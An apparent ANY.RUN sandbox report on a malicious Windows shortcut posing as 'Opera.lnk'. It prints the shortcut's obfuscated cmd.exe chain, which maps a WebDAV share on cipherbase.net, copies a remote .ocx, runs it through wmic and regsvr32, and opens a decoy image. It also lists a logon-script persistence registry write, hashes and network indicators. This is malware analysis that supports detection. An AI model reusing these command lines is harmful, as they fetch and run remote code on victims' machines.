File name:

IMG_051.lnk

Full analysis: https://app.any.run/tasks/a6a21840-3962-47f0-9cf0-718ebb93123c
Verdict: Malicious activity
Analysis date: January 10, 2025, 21:55:51
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
websocket
Indicators:
MIME: application/x-ms-shortcut
File info: MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has Working directory, Has command line arguments, Icon number=13, Unicoded, NoLinkInfo, Archive, length=0, window=showminnoactive, IDListSize 0x0138, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\"
MD5:

E968D6380FDFBE426EA1855C50ED516B

SHA1:

0E62A3D5B7807375D78A02178A4B91EC0256B5E5

SHA256:

A9633A007C2F4C72FFAA0A36A0BFF04E21AA7B2BA971E45124AAA4EEA6A3A37F

SSDEEP:

48:8d6lmNbtm34qlClDaPIl8lGlMXlcxlaql0KXl8GlaldlklVldl5lklgl+lMldlTB:8di2m3n4gIWcUKxQqiaqGA3ufHT+6EWj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Changes the login/logoff helper path in the registry

      • regsvr32.exe (PID: 6920)
    • WebDav connection (SURICATA)

      • net.exe (PID: 6304)
  • SUSPICIOUS

    • Abuses WebDav for code execution

      • svchost.exe (PID: 6344)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 6240)
      • regsvr32.exe (PID: 6920)
    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 6344)
    • Uses WMIC.EXE to create a new process

      • cmd.exe (PID: 6240)
    • Starts NET.EXE to map network drives

      • cmd.exe (PID: 6240)
    • Executed via WMI

      • regsvr32.exe (PID: 6920)
    • Uses pipe srvsvc via SMB (transferring data)

      • mspaint.exe (PID: 7004)
    • Potential Corporate Privacy Violation

      • svchost.exe (PID: 6344)
    • Attempting to connect via WebDav

      • net.exe (PID: 6304)
    • Connects to unusual port

      • regsvr32.exe (PID: 6920)
  • INFO

    • Reads security settings of Internet Explorer

      • WMIC.exe (PID: 6808)
      • cmd.exe (PID: 6240)
      • mspaint.exe (PID: 7004)
    • Creates files or folders in the user directory

      • regsvr32.exe (PID: 6920)
      • cmd.exe (PID: 6240)
    • Checks proxy server information

      • net.exe (PID: 6304)
      • mspaint.exe (PID: 7004)
    • Reads Microsoft Office registry keys

      • cmd.exe (PID: 6240)
    • Attempting to connect via WebSocket

      • regsvr32.exe (PID: 6920)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.lnk | Windows Shortcut (100)

EXIF

LNK

IconFileName: C:\Windows\System32\shell32.dll
CommandLineArguments: /v /c "set W1KSv2gf=s^e&& !W1KSv2gf!t "eAfJ=0" &&!W1KSv2gf!t "ZrbX=1" &&!W1KSv2gf!t "UdJy=3" &&!W1KSv2gf!t "Slmf=5" &&!W1KSv2gf!t "ckVR=c" &&!W1KSv2gf!t "uIiL=i" &&!W1KSv2gf!t "lwXz=e" &&!W1KSv2gf!t "CEyC=t" &&!W1KSv2gf!t "Ytbr=@" &&!W1KSv2gf!t "IcVp=." &&!W1KSv2gf!t "bknC=o" &&!W1KSv2gf!t "RCqB=x" &&!W1KSv2gf!t "QcIp=a" &&!W1KSv2gf!t "NKgh=l" &&!W1KSv2gf!t "oeny=n" &&!W1KSv2gf!t "VqMB=_" &&!W1KSv2gf!t "adzM=k" &&!W1KSv2gf!t "fGWZ=g" &&!W1KSv2gf!t "FWAA=s" &&!W1KSv2gf!t "DFUl=r" &&!W1KSv2gf!t "OwDa=v" &&!W1KSv2gf!t "kxFeTaB5=\\!ckVR!!uIiL!ph!lwXz!rbas!lwXz!.n!lwXz!!CEyC!!Ytbr!8!eAfJ!80\api\" && c!QcIp!l!NKgh! !W1KSv2gf!t "l8tFUdn6=58!ZrbX!!eAfJ!0!IcVp!!bknC!!ckVR!!RCqB!" && ca!NKgh!!NKgh! !W1KSv2gf!t "loc!QcIp!!CEyC!i!bknC!!oeny!!VqMB!!CEyC!="%l!bknC!!ckVR!alappd!QcIp!!CEyC!!QcIp!%\Pac!adzM!a!fGWZ!es\!Slmf!8100.!bknC!cx"" && net use !kxFeTaB5! && c!bknC!py !kxFeTaB5!!l8tFUdn6! !location_t! && wm!uIiL!c proc!lwXz!!FWAA!s call c!DFUl!e!QcIp!te "re!fGWZ!s!OwDa!r!UdJy!2 /s /u !kxFeTaB5!!l8tFUdn6!" && start !kxFeTaB5!IMG.png "
WorkingDirectory: C:\Windows\System32
RelativePath: ..\..\..\Windows\System32\cmd.exe
Description: Opera.lnk
TargetFileDOSName: cmd.exe
HotKey: (none)
RunWindow: Show Minimized No Activate
IconIndex: 13
TargetFileSize: -
FileAttributes: Archive
Flags: IDList, Description, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, NoLinkInfo
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
7
Malicious processes
2
Suspicious processes
1

Behavior graph

Click at the process to see the details
start cmd.exe conhost.exe no specs net.exe svchost.exe wmic.exe no specs regsvr32.exe mspaint.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
6240"C:\Windows\System32\cmd.exe" /v /c "set W1KSv2gf=s^e&& !W1KSv2gf!t "eAfJ=0" &&!W1KSv2gf!t "ZrbX=1" &&!W1KSv2gf!t "UdJy=3" &&!W1KSv2gf!t "Slmf=5" &&!W1KSv2gf!t "ckVR=c" &&!W1KSv2gf!t "uIiL=i" &&!W1KSv2gf!t "lwXz=e" &&!W1KSv2gf!t "CEyC=t" &&!W1KSv2gf!t "Ytbr=@" &&!W1KSv2gf!t "IcVp=." &&!W1KSv2gf!t "bknC=o" &&!W1KSv2gf!t "RCqB=x" &&!W1KSv2gf!t "QcIp=a" &&!W1KSv2gf!t "NKgh=l" &&!W1KSv2gf!t "oeny=n" &&!W1KSv2gf!t "VqMB=_" &&!W1KSv2gf!t "adzM=k" &&!W1KSv2gf!t "fGWZ=g" &&!W1KSv2gf!t "FWAA=s" &&!W1KSv2gf!t "DFUl=r" &&!W1KSv2gf!t "OwDa=v" &&!W1KSv2gf!t "kxFeTaB5=\\!ckVR!!uIiL!ph!lwXz!rbas!lwXz!.n!lwXz!!CEyC!!Ytbr!8!eAfJ!80\api\" && c!QcIp!l!NKgh! !W1KSv2gf!t "l8tFUdn6=58!ZrbX!!eAfJ!0!IcVp!!bknC!!ckVR!!RCqB!" && ca!NKgh!!NKgh! !W1KSv2gf!t "loc!QcIp!!CEyC!i!bknC!!oeny!!VqMB!!CEyC!="%l!bknC!!ckVR!alappd!QcIp!!CEyC!!QcIp!%\Pac!adzM!a!fGWZ!es\!Slmf!8100.!bknC!cx"" && net use !kxFeTaB5! && c!bknC!py !kxFeTaB5!!l8tFUdn6! !location_t! && wm!uIiL!c proc!lwXz!!FWAA!s call c!DFUl!e!QcIp!te "re!fGWZ!s!OwDa!r!UdJy!2 /s /u !kxFeTaB5!!l8tFUdn6!" && start !kxFeTaB5!IMG.png "C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
6248\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6304net use \\cipherbase.net@8080\api\ C:\Windows\System32\net.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mpr.dll
c:\windows\system32\netutils.dll
6344C:\WINDOWS\system32\svchost.exe -k LocalService -p -s WebClientC:\Windows\System32\svchost.exe
services.exe
User:
LOCAL SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
6808wmic process call create "regsvr32 /s /u \\cipherbase.net@8080\api\58100.ocx" C:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
6920regsvr32 /s /u \\cipherbase.net@8080\api\58100.ocxC:\Windows\System32\regsvr32.exe
WmiPrvSE.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft(C) Register Server
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\regsvr32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\aclayers.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
7004"C:\WINDOWS\system32\mspaint.exe" "\\cipherbase.net@8080\api\IMG.png"C:\Windows\System32\mspaint.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Paint
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mspaint.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\acgenral.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
3 425
Read events
3 423
Write events
2
Delete events
0

Modification events

(PID) Process:(6920) regsvr32.exeKey:HKEY_CURRENT_USER\Environment
Operation:writeName:UserInitMprLogonScript
Value:
regsvr32 /s /i "C:\Users\admin\AppData\Local\Packages\1012380.ocx"
(PID) Process:(6240) cmd.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.png\OpenWithProgids
Operation:writeName:pngfile
Value:
Executable files
3
Suspicious files
0
Text files
1
Unknown types
0

Dropped files

PID
Process
Filename
Type
6240cmd.exeC:\Users\admin\AppData\Local\Packages\58100.ocxexecutable
MD5:A87FC5F4F420D5D6768D24078142239B
SHA256:07A7B0136E3B053D9A73928FB17DAE88032B95E146FB27BDEC30057479C7D8F0
6920regsvr32.exeC:\Users\admin\AppData\Local\Packages\1012380.ocxexecutable
MD5:A87FC5F4F420D5D6768D24078142239B
SHA256:07A7B0136E3B053D9A73928FB17DAE88032B95E146FB27BDEC30057479C7D8F0
6344svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{D32809DF-CDA4-4548-8019-8CF1826FE80B}.pngimage
MD5:B4BD7C73D4D5DD13F16B6ED937F79634
SHA256:14BF2860F5642E285CDC56C80209FA96F460BAD1AA69998B548F3B3BB77CDD89
6344svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\{A75F7353-146A-49FC-A459-7F30EDAAE568}.ocxexecutable
MD5:A87FC5F4F420D5D6768D24078142239B
SHA256:07A7B0136E3B053D9A73928FB17DAE88032B95E146FB27BDEC30057479C7D8F0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
26
TCP/UDP connections
50
DNS requests
20
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6304
net.exe
OPTIONS
200
195.85.115.147:8080
http://cipherbase.net:8080/
unknown
1488
svchost.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6344
svchost.exe
PROPFIND
207
195.85.115.147:8080
http://cipherbase.net:8080/api
unknown
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1488
svchost.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.16.241.19:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
6344
svchost.exe
PROPFIND
207
195.85.115.147:8080
http://cipherbase.net:8080/api
unknown
6344
svchost.exe
OPTIONS
200
195.85.115.147:8080
http://cipherbase.net:8080/api
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1488
svchost.exe
2.16.241.19:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
1488
svchost.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4712
MoUsoCoreWorker.exe
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.227.215:443
www.bing.com
Ooredoo Q.S.C.
QA
whitelisted
1176
svchost.exe
20.190.159.71:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5064
SearchApp.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 40.127.240.158
whitelisted
crl.microsoft.com
  • 2.16.241.19
  • 2.16.241.12
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
google.com
  • 172.217.18.110
whitelisted
www.bing.com
  • 2.23.227.215
  • 2.23.227.208
whitelisted
login.live.com
  • 20.190.159.71
  • 20.190.159.23
  • 40.126.31.67
  • 40.126.31.69
  • 40.126.31.71
  • 20.190.159.73
  • 40.126.31.73
  • 20.190.159.68
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
cipherbase.net
  • 195.85.115.147
unknown
go.microsoft.com
  • 2.23.242.9
whitelisted
swisskernel.com
  • 195.85.115.184
unknown

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
Not Suspicious Traffic
INFO [ANY.RUN] Websocket Upgrade Request
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
Misc activity
ET HUNTING Successful PROPFIND Response for Application Media Type
2 ETPRO signatures available at the full report
No debug info